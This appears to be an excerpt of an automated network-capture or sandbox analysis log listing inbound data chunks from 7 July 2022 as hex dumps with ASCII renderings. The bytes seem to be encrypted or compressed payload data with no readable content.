                                                                                                                                                            2022-07-07 07:51:12 UTC1017INData Raw: de 49 86 72 c9 bf 49 0e 04 da f2 20 f7 0f 13 f6 28 14 33 63 b1 62 3e 99 66 bf bc 39 cc 03 f3 12 8c 5c 6b 35 13 6c f2 6f 4c 02 34 d4 1e 56 35 d9 44 14 54 aa 8f 79 5f 5c cf 47 78 cd 30 78 0d 20 ff 95 99 29 fb 9c 8b 39 d8 89 33 f5 05 2c 0b af d6 b2 07 99 3d df ee 0b 02 a4 c6 15 6c 19 7f e1 71 59 5d 5f a9 d4 7b 34 b7 4d c7 e3 4c e2 f5 71 2b 4f b5 7b ad 1c 9a 3f 4c 7d 5e c4 5d fd 69 a9 b1 2d 67 d2 b8 dd 71 a0 fa 2c 0e 23 0b 19 7c b5 1e d8 af 52 9a 0f 0a 02 72 d7 f3 da 87 f5 25 26 0e 56 ee e7 76 82 b7 10 17 b5 64 3c 82 2d cc 22 b6 fd 38 6f 82 43 2d 67 4d e4 21 fa 60 34 a4 24 0a 98 bc 8c 0f 1d f2 98 8f 66 80 d4 ab c4 46 3d 3f 74 17 6e 98 ef 75 dc 2c 28 77 c4 ef 5e b2 8a 25 82 f4 4d b9 d5 3a ca d9 69 aa 4a 8a a8 bc 35 7d ad 63 90 42 71 43 95 a2 c8 67 52 84 76 e2
                                                                                                                                                            Data Ascii: IrI (3cb>f9\k5loL4V5DTy_\Gx0x )93,=lqY]_{4MLq+O{?L}^]i-gq,#|Rr%&Vvd<-"8oC-gM!`4$fF=?tnu,(w^%M:iJ5}cBqCgRv
                                                                                                                                                            2022-07-07 07:51:12 UTC1021INData Raw: 62 9c bb ef 3f 13 ca 89 aa e1 6a e0 12 b8 fb 42 c0 d6 ee 38 a2 3a 48 cf 2c 4e e6 01 2a 7e 43 64 f2 3b dd a7 f7 ce 55 68 6a db 80 83 c7 97 a0 79 ac cb 29 bd 00 39 ba cf c3 b8 97 3e bc f5 09 8d 10 8f 3b 84 92 2d 1f 4f 93 47 dd 5a 92 02 15 70 95 5a 3e 07 ce 11 4d 12 a7 b9 de 13 bf 2d 13 e9 7c 77 fc f0 8f 59 39 e6 60 7b 24 f0 79 53 9a 30 a3 b1 7b 61 26 22 9f a3 c9 78 1e b5 ed 70 8c 31 f0 28 f3 61 93 4a 5b bd d6 b2 92 e4 47 d7 fa 54 a9 7b c2 a8 19 37 e3 54 a9 b3 bf d0 84 5d 95 00 7a 1a fc 03 8d 65 06 33 29 c2 b0 15 5c c6 ef c9 a1 24 df 53 5d 1a db b5 3d 6f e8 02 35 f1 e2 88 32 e6 d8 d4 ac aa ea 91 28 f1 7e 0c 2e 33 27 e3 24 a1 cb c7 db 95 b2 ca de c5 2c d4 96 63 0d 7b 81 1c 41 ff c7 c9 d5 29 4a c3 35 f4 f9 96 4d c9 2e bb b1 85 fb 69 42 4c 5f 3c 34 e4 1c c1 0e
                                                                                                                                                            Data Ascii: b?jB8:H,N*~Cd;Uhjy)9>;-OGZpZ>M-|wY9`{$yS0{a&"xp1(aJ[GT{7T]ze3)\$S]=o52(~.3'$,c{A)J5M.iBL_<4
                                                                                                                                                            2022-07-07 07:51:12 UTC1024INData Raw: 50 cc 37 2f 06 49 53 17 9e 80 08 64 50 e8 cb 32 70 a4 40 5c be 98 b8 43 c8 95 b8 51 4f 76 cb b1 52 10 da ff f2 51 2e aa 68 52 6d ef 4e 87 94 76 8e df cf 34 93 de f4 1b 58 9c 6d dd f4 30 5f 23 21 e0 a6 08 bb fe f0 73 14 8d 3f 68 7c 35 aa fa cd f2 7c eb 13 60 4d 38 6f 4d d7 3c 01 22 7b c1 48 4e 2d 6d d9 28 20 52 42 f1 6e 23 f6 4b 64 2a 1e 8c 81 ba 0d 52 4c 9f 8f 64 50 6a 7e 73 b1 67 04 d5 a4 99 14 64 27 21 7c fa 06 6b 68 fa d6 9f 0a 17 a0 3d 5a 50 d3 2d f2 37 68 72 ff 1b 7e 75 78 4b 92 cc 1d 56 ed de 23 d8 c7 d9 1d 81 57 e8 31 81 75 fe 30 d3 91 8f 4a e1 e6 d3 a4 bf 04 fd 76 ce b0 79 d8 8c d9 4a a4 bd 44 1c fb 9b 4f c0 94 2d 34 15 8f 56 ca 71 77 32 06 58 b8 e9 31 7e 75 6f f5 8a 85 91 f5 5f 42 28 e1 af b1 d9 2d 3b 47 b5 4d 8a 15 d6 a2 d0 9d 77 52 1d 25 93 72
                                                                                                                                                            Data Ascii: P7/ISdP2p@\CQOvRQ.hRmNv4Xm0_#!s?h|5|`M8oM<"{HN-m( RBn#Kd*RLdPj~sgd'!|kh=ZP-7hr~uxKV#W1u0JvyJDO-4Vqw2X1~uo_B(-;GMwR%r
                                                                                                                                                            2022-07-07 07:51:12 UTC1028INData Raw: 1f 17 99 33 dd b7 a5 ca 09 40 3e bb 2b b8 5e f7 77 01 45 e9 92 f1 99 76 a6 c5 21 e0 e2 b3 f3 71 df b6 60 02 22 70 dd 65 8c 73 a8 6a 28 68 36 f1 bf b0 20 2c ba 55 00 dc 96 58 4b f1 b3 3d 7b 8c c3 73 ec e7 b3 ec 8d 63 85 71 21 33 be f7 f7 27 a4 08 58 45 17 80 5f 99 5c b1 58 6f 79 3c d1 7d 28 94 32 59 c5 10 86 aa 2b d3 75 88 a1 39 32 ff 30 90 41 cd d8 8f 69 a1 64 21 a5 ee ee 60 7c ff a3 6a 81 72 d5 e1 a6 2e 32 cf dc 57 4d 44 d2 37 9b c5 da cd 03 ed 1c ba 76 70 24 b7 f1 9d df cd d0 83 d4 2c f7 9d 92 bd c6 1f 35 85 83 cd ec 6c 56 26 53 ad bd 48 6a d6 0b a3 ce 0b 93 75 7f 06 7f be 49 a0 45 ac 18 91 70 00 0f 47 80 26 97 a4 43 f4 5d 92 da 87 9a fd 6c 05 0c cf ee ab 81 2d c5 d5 2b b0 d8 e4 a5 71 76 46 93 d5 57 2e 98 f6 0d 95 92 47 8d df f5 20 bf 1b b4 d7 3b ba 3e
                                                                                                                                                            Data Ascii: 3@>+^wEv!q`"pesj(h6 ,UXK={scq!3'XE_\Xoy<}(2Y+u920Aid!`|jr.2WMD7vp$,5lV&SHjuIEpG&C]l-+qvFW.G ;>
                                                                                                                                                            2022-07-07 07:51:12 UTC1033INData Raw: 1e ff 15 f0 e5 c5 e1 e9 38 cf 03 cd 10 da 80 6f 7a 35 0f f5 52 47 96 1c 73 62 d2 2d 94 a6 d0 78 73 88 98 eb f3 cc 3a ca 5b 5f 49 9d e6 aa 42 25 09 74 c0 80 e3 05 e2 f2 6e b4 a6 69 50 1c 31 1a 1b a0 72 49 9c ba fe 45 26 20 46 02 f7 ea 6e e9 69 32 64 70 38 2c dc 85 27 cc 88 68 e8 39 06 06 6c 04 c1 ff 94 7b d5 71 4b 7a ec 37 5b a8 bb 51 ed 88 cc 64 6c 7d a5 a9 ae 7a 0b 89 cc d7 10 33 5f 73 5b 07 09 ea 82 64 09 be a1 e6 5d 37 77 39 01 fa 91 b1 c3 77 c5 67 ed 88 7e 83 56 ef df 82 0c 53 40 45 9f 53 0d e7 60 bb 74 a7 22 f2 a5 f3 26 ff b2 c0 a0 2f 6d f7 5f 06 15 41 2f 07 0b 55 de 02 3b ed 0a a8 75 8d 0f 77 67 74 d1 b7 57 25 8f 08 37 42 60 93 95 d8 17 63 d0 19 ab b9 81 7e 4d 1c af 99 c4 ec ee 7c 8e f9 47 9a 82 c4 48 38 6f d0 14 41 ef a6 84 0d 28 d3 70 92 34 25 92
                                                                                                                                                            Data Ascii: 8oz5RGsb-xs:[_IB%tniP1rIE& Fni2dp8,'h9l{qKz7[Qdl}z3_s[d]7w9wg~VS@ES`t"&/m_A/U;uwgtW%7B`c~M|GH8oA(p4%
                                                                                                                                                            2022-07-07 07:51:12 UTC1037INData Raw: 88 43 71 91 48 15 f6 50 f9 66 d5 0c 73 b8 7d 1a fb 7e 70 b6 5f 97 08 04 8e 72 df 7d 8e 9d 92 97 f8 ca 11 01 f3 12 8d ba 25 60 8b 5e 13 25 39 67 6d 06 a1 4d 1e 1a 80 71 0c ea e4 43 0d 7f e3 7e 50 cf 88 66 2a d1 e1 ab 48 4a ca 6e 7d be a6 3f 08 82 11 f5 92 45 fe 02 7a fa 64 df 44 c1 79 a4 8b 06 8a b8 ff 3e 46 4d 66 dc e4 4c 1e 21 25 cf ed 0d bc 26 78 f0 45 b3 b9 69 ab 4c 12 1d 2b 15 a9 54 58 72 6a 0a b9 45 0e e1 37 6e 4f e2 9c e0 e6 8b 4d ee 02 49 9c fc 5c a6 03 fb e1 22 de 8f 68 0e e0 41 00 0b bb fd e1 22 0b dd 16 29 12 51 36 e1 24 56 47 45 cd 84 61 24 21 52 68 29 78 fd 12 9d 8f 86 0a 56 b1 83 d7 da 91 a3 40 d8 f3 41 06 07 7f d2 34 ed c4 cc b7 1c df 1f 78 a1 08 45 2d e9 25 bd ee 0c c5 48 18 38 79 b7 61 87 62 05 e6 42 23 48 92 28 cc 8f 29 9d 0a f9 25 ff 64
                                                                                                                                                            Data Ascii: CqHPfs}~p_r}%`^%9gmMqC~Pf*HJn}?EzdDy>FMfL!%&xEiL+TXrjE7nOMI\"hA")Q6$VGEa$!Rh)xV@A4xE-%H8yabB#H()%d
                                                                                                                                                            2022-07-07 07:51:12 UTC1041INData Raw: a8 b8 e8 a9 39 68 22 2d 37 38 52 4b 37 c4 6f 02 77 30 d6 74 9f 7b 19 61 8a 2f 72 0d 7e 32 db 7e be aa fd 47 b7 2a 90 d3 d2 cd a8 88 eb f9 04 70 16 59 5a 53 ea 00 ff f5 94 56 a3 97 d0 e8 2c 4a df 09 26 29 58 f5 bd b5 90 96 ef 3a 7f 20 2f 19 f0 95 f6 aa 72 39 e8 dd d5 ae fa 77 66 c8 61 e2 7a cb 6f 64 a8 ba a6 95 86 68 d9 e5 b1 80 30 e8 06 c8 ef b7 6f 20 5b d6 b0 9e 5f 68 76 cf 68 56 73 d4 77 65 95 fb d3 e8 4c fa 57 6a 54 57 f3 4d f7 0e f4 7b 5e ca 49 12 ff a6 26 9a 72 79 9c e9 53 3a ef 79 cd c9 1c 9c 63 7a 92 05 14 24 ce fe 81 e6 64 ad 86 50 f9 df 3b 5b 89 fb 88 5e 16 ff cb bd c6 b2 34 c3 48 45 77 8a c6 7a ba d4 7a a2 f1 0e 6a 7d f1 68 e8 fa da ec ed af c6 59 8e 8a 10 f5 86 60 7d cf a7 c5 f3 5a 6a 17 22 1e aa f5 f5 9f 49 98 48 ab 6c 36 df 60 a2 cf 8b 3c be
                                                                                                                                                            Data Ascii: 9h"-78RK7ow0t{a/r~2~G*pYZSV,J&)X: /r9wfazodh0o [_hvhVsweLWjTWM{^I&ryS:ycz$dP;[^4HEwzzj}hY`}Zj"IHl6`<
                                                                                                                                                            2022-07-07 07:51:12 UTC1045INData Raw: be a1 89 ba 09 a2 58 7f a2 60 d2 73 d4 c7 7a 20 96 17 28 9b 1b cf 5d 2a bc 14 8d 8f 81 9d ba d1 85 a6 b6 2b 8f 31 07 19 e4 28 c2 bb 00 6d 10 c6 2b 8a 35 51 6f 71 6c 48 43 22 82 ed 9d d5 6c 40 fb 58 b7 dd fb 5f 15 9a 09 cb 53 be 62 a4 59 ba 72 33 c6 c6 c9 3f 03 ed 61 15 c1 25 28 8f b0 d4 f1 70 a2 7c 87 9e ab 7e e0 d7 cb 9d 1d 1a 21 03 0f 1d bd 77 15 dd 50 c0 09 4f 0d 93 71 45 87 b3 0b d3 9b 16 28 62 3b 22 df 08 84 90 4b 18 ec 6e 25 d6 67 1f 27 5e 72 71 fa 43 09 52 42 21 3c 05 e1 5c 0d 35 3b 4b c9 da f3 7b ed 9f 6b ce a2 2e b1 9e 47 ba 63 dc 67 30 4d 2e 54 d3 dd cc 3b e9 59 1e 0e 28 bb ee 0d e7 97 42 61 d6 98 7c 23 73 dd 2e f0 6e ac 7c 85 cb cb 15 0d b5 26 8f 95 d4 11 76 92 c2 4b 26 3d 8d 70 2e 25 df c4 1c ad fc 6e c7 7b 3f 5e 56 97 a9 d4 4a 68 98 4c c1 72
                                                                                                                                                            Data Ascii: X`sz (]*+1(m+5QoqlHC"l@X_SbYr3?a%(p|~!wPOqE(b;"Kn%g'^rqCRB!<\5;K{k.Gcg0M.T;Y(Ba|#s.n|&vK&=p.%n{?^VJhLr
                                                                                                                                                            2022-07-07 07:51:12 UTC1049INData Raw: b1 15 68 ad da bf 8e 0f 53 26 e9 c0 d9 b3 44 64 10 c4 55 e4 e7 ea 9a e4 33 35 97 cc 9d c7 57 fe 70 f5 cf 82 24 04 76 9a dc c8 e4 39 78 3a 31 1f 03 83 6e 69 16 17 35 f4 92 e4 d9 b3 a1 33 ef d7 27 5e 99 7d ad d2 91 f6 be 20 ce c4 75 ba 60 e4 9d 14 ff 11 3a ef 46 1e 1e 2d 7c 3f 92 ba f7 c3 51 85 03 1b ff ae 13 9b 1c 4a 5d 23 7f 93 d2 af c0 dd 5a ef 05 98 41 c6 5f 0d 40 49 bc 22 41 92 e5 f0 6a 23 66 6a 02 a9 20 ba 85 8f 20 4f 79 6f 3e 9c e9 cc 12 bb c5 f9 0b a8 8a 97 cc ed 5f 8f cd 78 75 46 1c 02 41 4d ea 5a b6 ac ce 37 62 b0 12 d5 88 df 90 c4 36 cc eb de 85 ec fc ba ba b6 eb a2 cb 45 94 35 ec e0 c4 02 83 e8 02 4c 0b 2b 28 be 35 65 59 03 59 42 40 8d cb 02 24 e4 0d 20 de 7f ea 1f b5 de e6 02 98 b1 a2 96 fc fd 43 39 7c b0 55 61 28 c5 ec 25 b2 63 73 73 5f af d8
                                                                                                                                                            Data Ascii: hS&DdU35Wp$v9x:1ni53'^} u`:F-|?QJ]#ZA_@I"Aj#fj Oyo>_xuFAMZ7b6E5L+(5eYYB@$ C9|Ua(%css_
                                                                                                                                                            2022-07-07 07:51:12 UTC1053INData Raw: 89 5b 0f 78 05 17 dc cd a1 56 1a 41 e9 e2 4a e1 1e 0e e2 85 48 d6 47 f5 e2 79 10 3b 28 a4 0e 27 58 4c f9 84 cb 63 dc 18 d9 9f a2 45 a5 0b 05 f4 86 d8 45 cb 2e 49 d3 02 a6 09 d2 b1 5b 85 06 59 01 f5 60 87 33 6d af 5c ee 33 31 a5 d5 f8 32 ca b3 4c b2 3c 88 1d 52 68 af 01 92 61 9f f8 19 73 05 48 86 c7 a6 b5 8b 6e b7 e7 66 2d e7 e7 3b f6 a9 a3 02 3e 70 e7 b7 a6 12 80 17 ce 43 b0 b4 97 3b 2b 0e 51 57 82 37 15 94 01 e7 e5 21 3e a8 88 8f 79 ca 0f ed e7 92 23 c9 20 ea 80 f2 1c b2 7c 3d 15 28 67 b9 be 2e 93 86 23 35 ea dd 25 be e1 e0 b9 a2 d9 8d ce ef f7 56 17 75 64 27 74 01 20 4c ae 45 87 57 b6 83 4c 9b 50 e5 a2 58 92 37 0a 22 60 2c 73 aa 09 b9 e4 1c f9 0d e7 a5 35 64 ec 28 87 44 70 11 fe ba 4f fa 96 61 1a 02 7f 03 d5 29 41 e1 e8 60 66 bb 59 53 fa ae 02 29 cd f9
                                                                                                                                                            Data Ascii: [xVAJHGy;('XLcEE.I[Y`3m\312L<RhasHnf-;>pC;+QW7!>y# |=(g.#5%Vud't LEWLPX7"`,s5d(DpOa)A`fYS)
                                                                                                                                                            2022-07-07 07:51:12 UTC1056INData Raw: b3 9c f0 d1 ac 1b d5 a8 df fd 12 6a fd d6 08 8b 20 d2 1c 28 61 dc 0e 1d df 9a 9e c6 61 3c 98 07 aa 72 69 0c 21 43 58 21 6d 9e 2b 52 c3 3e a4 97 86 b8 fa eb ca 06 26 f2 fb e4 9d 70 e7 3a 4b d2 bc a6 b3 3b cc e4 1a 94 29 dd fd 73 bd 03 0e 02 ec 5b 3b 93 27 c9 ad 2b d6 a7 03 7a f6 51 ca 06 2a 24 c6 cc 94 cc a4 5a 4a e1 2f 00 96 96 e9 0f c5 4a c0 79 68 6e d1 62 fb 31 18 7e fa e4 45 d9 96 9f b7 07 01 9a f1 ac 77 b4 d2 56 68 75 f0 79 80 37 c6 e0 e3 07 18 39 24 f3 0f d6 1b 03 d4 2c ae b6 68 b4 20 26 9d 1d a6 83 11 ff 81 ba fd 0a af 6e 58 90 c0 9e 92 ed b4 e6 b2 26 88 21 70 7c 96 08 e3 62 49 c6 d9 e5 25 55 5d 76 74 a5 40 31 e0 6b ee f7 a1 3e b3 e6 01 a6 6f 9c 70 35 39 6a 02 3e f8 5f 7f 74 a2 54 3a 2f 1c 5f 08 bb b3 0d d6 30 36 1e bb af 57 9a fc 4a 31 4f eb 92 55
                                                                                                                                                            Data Ascii: j (aa<ri!CX!m+R>&p:K;)s[;'+zQ*$ZJ/Jyhnb1~EwVhuy79$,h &nX&!p|bI%U]vt@1k>op59j>_tT:/_06WJ1OU
                                                                                                                                                            2022-07-07 07:51:12 UTC1060INData Raw: ed 15 17 86 b1 83 7d c8 e7 e8 f0 81 85 bb 3b e1 ff 87 9a 82 d9 1f c2 7e 46 99 ec 67 9b 21 1c da a1 5e 18 42 bd 4a b4 36 85 29 a6 25 38 37 d2 30 c4 fe 82 c5 61 7c 9d 0e 92 8f 24 29 80 90 60 2d 01 28 af 6f 26 71 c3 6d 10 5a 11 a3 cc eb c8 d8 1c f5 90 c8 a8 85 3d ca 31 03 a9 83 8e eb 99 9a 83 ff a6 fd f6 5d 4c 87 7f 7f 4a 8c dc 6a 47 2d 30 6d 09 fc 4f 06 c2 c2 79 dc 00 98 de 9a 63 df 60 b3 97 bb cb 03 24 f0 f9 eb 27 ed 01 63 00 48 de 59 2f 27 bf 3a bc b3 91 98 a7 99 4a 61 d5 82 d3 c8 0a ec df c9 d4 ef c2 0d 94 d3 c3 ca ae 3e 67 b4 bd d4 91 3a 8e fe b4 a9 82 3e fd f7 99 2e 19 bf 8d ef b8 75 02 47 42 7c 13 04 41 74 db a5 5e b0 c4 c5 10 ef 05 ca 25 35 c7 ae 1c 8f 6d 8d 83 a4 ff 55 f4 1e de 24 fc 9c 3a 2a 3f 95 7b d0 36 76 db ba 42 91 79 83 8d 71 0e 7f 46 8a 5c
                                                                                                                                                            Data Ascii: };~Fg!^BJ6)%870a|$)`-(o&qmZ=1]LJjG-0mOyc`$'cHY/':Ja>g:>.uGB|At^%5mU$:*?{6vByqF\
                                                                                                                                                            2022-07-07 07:51:12 UTC1065INData Raw: 37 0e 35 d6 32 df 76 21 69 41 c3 03 7c b4 49 df 98 76 ae 51 1d f9 76 fd b2 30 ea 66 d1 7c 5d de 72 ae c4 c0 22 cb ba b2 58 68 14 04 1e 06 02 e3 19 68 56 2f 8a e7 ea 3e 68 21 4a de 05 22 96 ee 39 4f b2 d5 6f 1f 94 c4 e0 36 1a a4 be 4c 54 9a 50 c6 58 19 d8 d4 c1 4f b3 57 bb 2d 39 b9 e6 d0 9f 40 5c 6b 6a 46 1b 87 6f 22 7c 20 c3 b0 79 99 1d 98 4a ed bd 14 0b d1 fc 5e d8 16 1c 3e 13 f8 e3 6b 00 0c be 02 e3 73 bb 37 8e 27 70 f3 9f 76 eb 2c 72 be 3c 8d b5 70 49 51 49 5d 3e 87 8b 80 f6 4e 0c 26 27 36 2a 86 14 85 81 6d fc 6a a4 36 7e 9f b0 4a 30 c4 30 6e 42 cf e6 15 87 24 22 2a d4 51 ad 86 86 53 ad 2c 05 d7 b3 4c fd 25 01 60 50 fe ba 15 fd 5c 93 9e 96 99 fe b9 22 fd b1 81 a0 6c 76 db 6d 8f 44 22 20 47 ea 40 12 a8 08 0d 41 f6 e9 d1 bd 05 af 63 c3 d2 3a e0 b5 69 4e
                                                                                                                                                            Data Ascii: 752v!iA|IvQv0f|]r"XhhV/>h!J"9Oo6LTPXOW-9@\kjFo"| yJ^>ks7'pv,r<pIQI]>N&'6*mj6~J00nB$"*QS,L%`P\"lvmD" G@Ac:iN
                                                                                                                                                            2022-07-07 07:51:12 UTC1069INData Raw: 17 fb 02 74 a1 39 e7 ee ae 15 4f a0 fa b6 a6 32 e9 ea 3d 14 3e 3b 28 9d 0e 6a 51 fd 20 41 66 0e d9 26 eb 8b af 4f 26 b3 80 fd df 16 b9 be a2 fe 43 5d a4 a7 b3 79 28 30 73 9b 15 74 35 6c 50 8f e0 05 08 8e cc 06 44 61 74 e9 42 ec 24 87 d1 77 7a de db 86 55 41 4a 35 7d 98 0f eb 9d af e7 14 53 01 84 11 6e 09 23 7a 65 10 cb 0b 37 b0 37 42 0a 29 93 b2 5c f5 0e ba dd 09 ba c9 36 03 23 ce ce 7c 32 12 16 c4 17 a4 1d ca c2 c6 81 2c e8 dd e4 9b 6c 9b d8 d3 bc 36 83 02 c8 af 31 12 c1 b6 56 b0 7a b8 8f bf ad 7d bd f4 53 d4 f7 bf a7 dc 01 6c c8 ab c0 66 58 5a f2 b5 96 d8 72 23 ac 94 12 ec 2b e3 e2 95 60 5a 4f 81 62 b1 bd 31 09 56 16 64 b2 7f 2b 0b 55 8b 8a fd 7e a9 44 ed b3 09 21 13 a9 cb da 02 16 10 d1 b4 7d 56 45 be 1f 26 4c 53 8e bc 47 08 3d b9 06 25 ba 7e 57 27 c8
                                                                                                                                                            Data Ascii: t9O2=>;(jQ Af&O&C]y(0st5lPDatB$wzUAJ5}Sn#ze77B)\6#|2,l61Vz}SlfXZr#+`ZOb1Vd+U~D!}VE&LSG=%~W'
                                                                                                                                                            2022-07-07 07:51:12 UTC1073INData Raw: c6 b7 21 1b 94 82 06 d8 92 00 76 a9 c6 ea 60 31 51 f7 99 31 9c 4d b4 ef dd 53 a1 00 89 a7 0d f6 eb 35 02 1e 9c 52 d1 03 f0 0c 8d 47 aa af 14 ad cd 06 02 d3 20 8c 65 9b ef eb 81 63 99 43 83 e4 70 aa f1 3c 96 d0 ce 0b ae 10 6d 25 75 5d 3d 2a 72 8e 03 8d c1 76 b5 cf d5 47 70 96 16 3f 05 aa 5e 44 89 71 53 18 9d 1b c4 98 a8 c0 7b 08 db 7c b8 10 52 d0 c2 bb 10 31 b0 93 99 5a 0f 35 96 18 c4 95 bc 65 50 35 63 a9 20 68 af 0f e9 ce cc 69 f0 c8 fc 95 f2 09 ac 3b 7f 18 fa 4c 60 1e 4b a6 f9 84 9b fa a8 67 e2 f8 bc 31 cf b3 50 0d e3 c3 7e d9 56 a9 b1 32 ae 2d ad ab 83 c0 a7 da 4d d1 a5 de ad aa ce ba 89 94 df 1e 55 24 d2 5e 25 19 73 90 3b b2 ef 08 3b 74 cf 25 7f 2d d4 cc 59 ec bc e7 82 42 14 23 dd 4a c6 2a 51 4c a2 6a 6e f1 5b ea b4 61 f3 d2 e0 24 db 9e 45 df 74 fc 55
                                                                                                                                                            Data Ascii: !v`1Q1MS5RG ecCp<m%u]=*rvGp?^DqS{|R1Z5eP5c hi;L`Kg1P~V2-MU$^%s;;t%-YB#J*QLjn[a$EtU
                                                                                                                                                            2022-07-07 07:51:12 UTC1077INData Raw: 42 0e 72 86 2c 70 ee be 77 8b d3 55 26 e4 1e 82 0d 72 4b a7 5e 24 f7 d7 40 fe 07 07 74 60 cb e9 1c 5e 79 ec a1 09 31 4e 1d 3b 12 80 b6 20 5a e6 32 88 8c 68 71 7c e0 72 22 d9 ce 3a e0 8c f1 db 77 e9 f6 29 53 38 f4 50 26 2d 26 75 e3 dc cd 3b 23 b5 97 8d 52 22 7d bf 1d ab 05 f9 41 92 9a c7 7f 6b ce 65 00 df 17 50 2f 07 68 07 cd 20 e2 36 f1 78 bf 48 16 f8 f8 41 80 93 55 0b 8b 88 6d ee 67 7a 4a 0a 9f 3c 93 8b b6 df 4a 38 f4 31 d5 a9 0f 36 ba f2 d8 e6 e1 54 21 df aa 7e fe 46 c9 09 71 17 82 63 04 40 e2 b9 94 84 5d e6 14 aa 5a 7c 52 57 d4 fb f1 f8 f2 10 ba a3 59 fd 90 6c e1 da e6 e5 ac bb 4d 8a 13 a7 fd f2 f5 7a 63 a9 90 a2 ea c6 0e 4c 16 9b 7d 44 30 4c 2d e1 2d d3 e4 e3 b9 3c 9b 39 a7 9f f6 e6 8a c3 ed 00 b5 80 86 3c 67 4d cd e2 06 ca b7 20 fd 64 af f4 24 33 9f
                                                                                                                                                            Data Ascii: Br,pwU&rK^$@t`^y1N; Z2hq|r":w)S8P&-&u;#R"}AkeP/h 6xHAUmgzJ<J816T!~Fqc@]Z|RWYlMzcL}D0L--<9<gM d$3
                                                                                                                                                            2022-07-07 07:51:12 UTC1081INData Raw: 6e 67 6f 00 b0 a4 c6 42 90 7c 3e f5 41 f2 77 dd 63 26 dd d6 cd 62 3c 89 2b 8a 48 07 07 c9 b5 33 2b 34 c0 bf 3e b8 a3 72 4e f3 45 83 3b f7 e8 0d c7 3c 9b 1c 7a b4 e5 d4 de 68 2b e7 54 ba c1 e8 ad 08 c8 9d 17 75 f4 4e 38 a9 c6 9a bd 97 c7 f7 39 2c 4b 22 da d6 42 bd 48 23 99 d5 8f 10 1c 6d 67 32 02 5e 8a 7f 34 f4 dc 35 41 d9 40 b2 65 c1 ef 45 1f 90 7b 43 a4 8c f3 df 49 24 3b 61 82 64 ce 64 4d 27 a9 d8 9d 74 4e b0 f2 f3 9d 86 e6 f9 eb b6 d1 72 ee ff f5 d2 27 e9 46 27 28 d9 3d 9d 9d d6 c4 fb 60 db eb a3 4e f3 af 77 f4 c5 e9 c4 19 11 cc 21 41 29 8c 8f 06 69 f6 03 0b f0 c4 df a7 90 7b ed c1 20 47 4f 19 f1 60 ba f7 b7 46 6a 41 24 06 ee 1b 01 7c 94 53 f8 33 6c d0 4f 44 54 1d 62 ee e7 01 44 fa 97 f1 b4 01 ff b4 16 fe fc ff 9a 6e ac 24 4c 98 05 3a d7 54 71 d6 19 27
                                                                                                                                                            Data Ascii: ngoB|>Awc&b<+H3+4>rNE;<zh+TuN89,K"BH#mg2^45A@eE{CI$;addM'tNr'F'(=`Nw!A)i{ GO`FjA$|S3lODTbDn$L:Tq'
                                                                                                                                                            2022-07-07 07:51:12 UTC1085INData Raw: 36 5b 17 d1 b3 f3 4e 8a 5c de aa 73 b3 3c 93 cb db b2 eb af 20 9f d3 9b 75 9b 5d b6 3b 94 7c 62 81 26 99 32 c1 4a a1 a3 41 71 b0 ee e2 1d 2d 57 d0 72 8a ef 97 1b 6c 61 18 f3 1e a2 74 33 3d f3 c6 25 76 97 74 c9 d6 b0 09 9b ed b2 e0 c0 fd a2 84 bf 0e 9c e2 04 2c 66 22 66 19 47 f4 8d 8e 76 3a 11 99 69 00 ba c5 ce a5 e1 bd bb 2a ec 42 dc 01 d4 ed 04 82 63 59 e9 fa f6 6a b6 c7 b5 97 53 17 4e fb e2 7c 8a 8f ff 31 78 50 20 98 78 b1 75 1c dc 64 91 37 40 80 c9 8f 18 36 e0 b8 d6 e3 2d a3 82 ec 33 1e 91 38 bb bd 36 5e 26 77 be 0f b3 bf 6a 84 76 fd 67 dc c1 f6 6c c0 7c 71 83 f2 cd da 2d 65 e3 e4 40 13 6d f6 b3 bc 1a 25 51 26 2a 38 78 38 2d fc 00 5a a3 e4 88 a7 fe da 2d 12 6d 82 5d b3 97 6b 22 48 2b 37 37 63 58 e3 f8 c0 e9 68 19 90 73 59 6f 02 04 30 d1 5d 96 1c 75 a5
                                                                                                                                                            Data Ascii: 6[N\s< u];|b&2JAq-Wrlat3=%vt,f"fGv:i*BcYjSN|1xP xud7@6-386^&wjvgl|q-e@m%Q&*8x8-Z-m]k"H+77cXhsYo0]u
                                                                                                                                                            2022-07-07 07:51:12 UTC1088INData Raw: 3d 49 ef cc a3 08 fc b0 84 34 6a 80 dc 94 a3 76 5a eb 07 47 e8 4f 51 89 0b dd c6 1c fe a3 b0 fb fe 3a 6c dd f3 6e f1 3f 99 db 47 2f 7e 3e 9c 36 b9 db ea ff de 59 92 45 e8 38 37 e8 45 b5 89 0b b8 cd 80 35 70 25 69 39 21 96 17 49 d1 44 3a 70 9c a5 41 f0 24 78 28 30 de b7 21 9f fc a7 e4 69 87 33 eb 4a 70 b1 79 a6 de e5 84 4b 0c c2 ee 87 ec 50 7a e3 f3 1b 9b e6 37 27 03 25 35 4a 89 5e 31 45 52 c6 c3 07 ac 12 f5 79 a8 ed bf fc 56 d3 68 c0 05 69 83 5b a3 5f c3 20 87 fe 7b d7 33 15 9a 48 73 1b 42 02 f6 0c 3e c6 6f e4 4a cb 07 d4 ae c9 6d 41 f4 23 7c 5a 52 35 bd 9c e8 1e 72 99 68 3e b9 88 1f 2a 39 da e1 98 bd 74 f6 61 67 0d d2 24 d2 e2 9d 02 04 eb f5 c4 78 e5 f0 5c 91 c8 0f 22 b8 d8 46 a2 86 d9 8a 17 75 e3 4e 2f 7f 35 1e 22 89 53 6a 95 ba 6b 0c 59 62 dc 74 aa 3c
                                                                                                                                                            Data Ascii: =I4jvZGOQ:ln?G/~>6YE87E5p%i9!ID:pA$x(0!i3JpyKPz7'%5J^1ERyVhi[_ {3HsB>oJmA#|ZR5rh>*9tag$x\"FuN/5"SjkYbt<
